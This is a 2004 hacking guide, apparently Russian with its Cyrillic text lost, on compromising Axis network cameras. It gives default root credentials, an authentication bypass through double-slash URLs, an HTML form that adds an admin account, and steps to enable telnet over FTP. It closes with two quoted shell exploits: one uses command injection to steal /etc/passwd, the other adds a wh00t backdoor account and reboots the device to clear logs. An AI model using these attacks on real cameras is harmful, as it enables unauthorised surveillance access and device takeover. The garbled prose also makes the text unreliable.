    AXIS.

 : InuYasha / Sep 2004

  The Clash, Chris Gragsone

             Axis,
 ,     .   
        .


		000. 
		001.    Axis Network Camera
		002.  ,    
			003.  -
 			004.     
 			005.  
 			006.   -   
 		007.  telnet-  -
 		008.  
 		009.    -   
 		

0x00. .

   Axis  Communications   ,      
   IP-,     
 Linux,      100MhZ  RISC-,  
,                IP- (
Internet)    LAN,    ,    -  (802.11b).   
  -    http    ftp  ,      
-    ,      telnet       
.            
             
   .       
,         TV,
              .   
              
 http://www.axis.com,       .


001.    Axis Network Camera

    -    - 21  80.

  80      http-.          ,   
       TITLE     "Axis xxx Network Camera
y.yy",    xxx  -  ,    2100,    y.yy  -     
,  2.32.

  "HEAD" (GET HEAD / HTTP/1.0)  :

	HTTP/1.0 200 OK
	Date: Thu, 13 Apr 2004 12:21:19 GMT
	Server: Boa/0.92o
	Content-Length: 318
	Content-Type: text/html
	Last-Modified: Thu, 13 Apr 2004 xx:xx:xx GMT
	Client-Date: Thu, 13 Apr 2004 xx:xx:xx GMT
	Client-Response-Num: 1

 "Server"   ,     Boa.


 21   ftp-.

     :

	yasha# ftp xxx.xxx.xxx.xxx
	Connected to xxx.xxx.xxx.xxx
	220 Axis 2120 Network Camera 2.12 Apr 04 2002 ready.
	User (xxx.xxx.xxx.xxx:(none)): test
	331 User name okay, need password.
	Password: test
	230 User logged in, proceed.
	^C

 :       .
 :  C      21   80 ,      , ,
  ,        
 .  http-    "Server: Boa",   ftp "Axis".
  .    ,      .  ?
  , -     ;)

002.  ,    .

 003.  -

	 :       root    
	"pass",     .

	  :             -
	  ,      ftp -   
	 root.

	 :     !



 004.     

	 :      ,   
	.

         :        :
  
        	/java/ -   java-  
		/java/users.shtml - , ,    
		/jpg/
		/pics/
		/support/
		/support/messages -  /var/log/messages
		/demo/edu640x480jav.shtml - ;)


	 :         
	            -.        
	 http- :

		  /etc/httpd/conf/boa.conf
		   :

			AuthPath /usr/html/support/ axadmin
			AuthPath /support/ axadmin


 005.  

	  :         ,  
	                     
	.       "/"   .

	 : 

	http://x.x.x.x//admin/admin.shtml -     
					     .
					    
	http://x.x.x.x//admin/img_general.shtml -  

	http://x.x.x.x//admin/netw_tcp.shtml -   

	http://x.x.x.x//admin/sys_date.shtml -    

	http://x.x.x.x//admin/com_port.shtml -   

	http://x.x.x.x//demo/

	http://x.x.x.x//admin/sec_users.shtml -        
	    .       -
	      .   , 
	      "user"     ADV (Administrator,
	Dial-up, View)     .       
	 ,     .
				
	<HTML>
	<HEAD>
	<TITLE>Axis Network Camera Exploit by InuYasha</TITLE>
	</HEAD>
	<BODY>
	<FORM NAME="WizardForm" ACTION="http://x.x.x.x//this_server/ServerManager.srv" METHOD="POST">
	<INPUT NAME="conf_Security_List" VALUE='user:ADVO::'>
	<INPUT TYPE="HIDDEN" NAME="servermanager_do" VALUE="set_variables">  
	<INPUT TYPE="SUBMIT" VALUE="[+]">
	</FORM>
	</BODY>
	</HTML>

	 :   

	AXIS 2100 Network Camera: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2100/2_40/
	AXIS 2110 Network Camera: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2110/2_40/
	AXIS 2120 Network Camera: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2120/2_40/
	AXIS 2130 Network Camera: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2130/2_40/
	AXIS 2400 Video Server: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2400/2_40/
	AXIS 2401 Video Server: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2401/2_40/
	AXIS 2411 Video Server: 3.12 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2411/3_12/
	AXIS 2420 Network Camera: 2.40 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2420/2_40/
	AXIS 2460 Network DVR: 3.11 ftp://ftp.axis.com/pub_soft/cam_srv/cam_2460/3_11/
	AXIS 250S Video Server: 3.10 ftp://ftp.axis.com/pub_soft/cam_srv/cam_250s/3_10/

 006.   -   

	 :  - ,     command.cgi    
	 ,     ,   
	         (    ;)  ), 
	       .
	
	 :        .
	
	Axis 2100 Network Camera (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2100/sr/
        Axis 2110 Network Camera (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2110/sr/
        Axis 2120 Network Camera (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2120/sr/
        Axis 2420 Network Camera (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2420/sr/
        Axis 2130 PTZ Network Camera (2.32.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2130/sr/
	Axis 2400 Video Server (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2400/sr/
	Axis 2401 Video Server (2.33.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2401/sr/
	Axis 250S MPEG-2 Video Server (3.02 RC1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_250s/latest/
	Axis 2460 Network Digital Video Recorder (3.01) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2460/latest/
	Axis 2490 Serial Server (2.11.1) - ftp://ftp.axis.com/pub_soft/cam_srv/cam_2490/sr/


007.  telnet-  -

- - ,        
   -   .

   ftp-    :

yasha# ftp x.x.x.x
Connected to x.x.x.x
220 Axis 2100 Network Camera 2.12 Apr 13 2004 ready.
User (x.x.x.x:(none)):  
331 User name okay, need password.
Password: 
230 User logged in, proceed.
ftp> ascii
ftp> cd /etc
ftp> get inittab
200 Command okay.
150 Opening data connection.
226 Transfer complete.
ftp: 1380 bytes received in 0,01Seconds 148,00Kbytes/sec.

          inittab       
  :

#telnetd:3:respawn:/bin/telnetd
 #,      :
telnetd:3:respawn:/bin/telnetd

 

    ftp-       :

ftp> put inittab
200 Command okay.
150 Opening data connection.
226 Transfer complete.
ftp: 1379 bytes sent in 0,01Seconds 2424002,00Kbytes/sec.
250 Command successful.
ftp> bye
221 Goodbye.

        -   telnet.


008.  

          root.

1.     Axis Network Camera,    
    ,    .
2.   ,   
3.  ftp  /etc/passwd
4.   root'a
5.  telnet-   
6. ;)

009.    -   

1.                 ,     
 ".bin"
2. ,       .
3.     (    )  "/etc"
4.   ftp-    root
5.        "bin"
6.   "hash"     
7.         "put xxx.bin  flash_all",  xxx.bin 
-    .
8.         
  .


 : 

 (  )        
Full-Disclosure   2004,   bashis.    
 .      ,    
   Full-Disclosure.

   :

/* Public disclosure due lack of responce from Axis Communications */

----[ axis-passwd.sh ]----

#!/bin/sh

# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)

# Problem:
# PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'`
# in 'virtualinput.cgi'

# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet

# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.

if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi

printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/pa
sswd\x60 HTTP/1.1\n\n" | nc $1 $2
printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+
++ Received:\n"
printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-wh00t.sh ]----

#!/bin/sh

# Add admin account with l/p: wh00t/wh00t
# Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)

# Problem:
# POST action follows "/../"

# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet

# 2.12 seems to very buggy version, it add wh00t account,
# but editcgi.cgi seems not to work..

# Yes, you can use 'editcgi.cgi' to edit /etc/passwd
# and change/add what you want, or browse around in filesystem.

# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.

if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi

printf "+++ Sending request to %s:%d\n" $1 $2
printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250\
nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&us
ers=wh00t&username=wh00t&password1=wh00t&password2=wh0
0t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec
_users.shtml&servermanager_do=set_variables\n"
| nc $1 $2 > /dev/null
# Note.......^^^^^^^^^^^^^^^^^^^^^^

printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0\nHost: 127.0.0.1\nAuthorization: B
asic d2gwMHQ6d2gwMHQ=\n\n" | nc $1
$2
# it's good to clear logfile, so let us reboot the device now
printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n"
| nc $1 $2 > /dev/null
printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-bin/edi
tcgi.cgi?file=\n"
printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n"
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n" 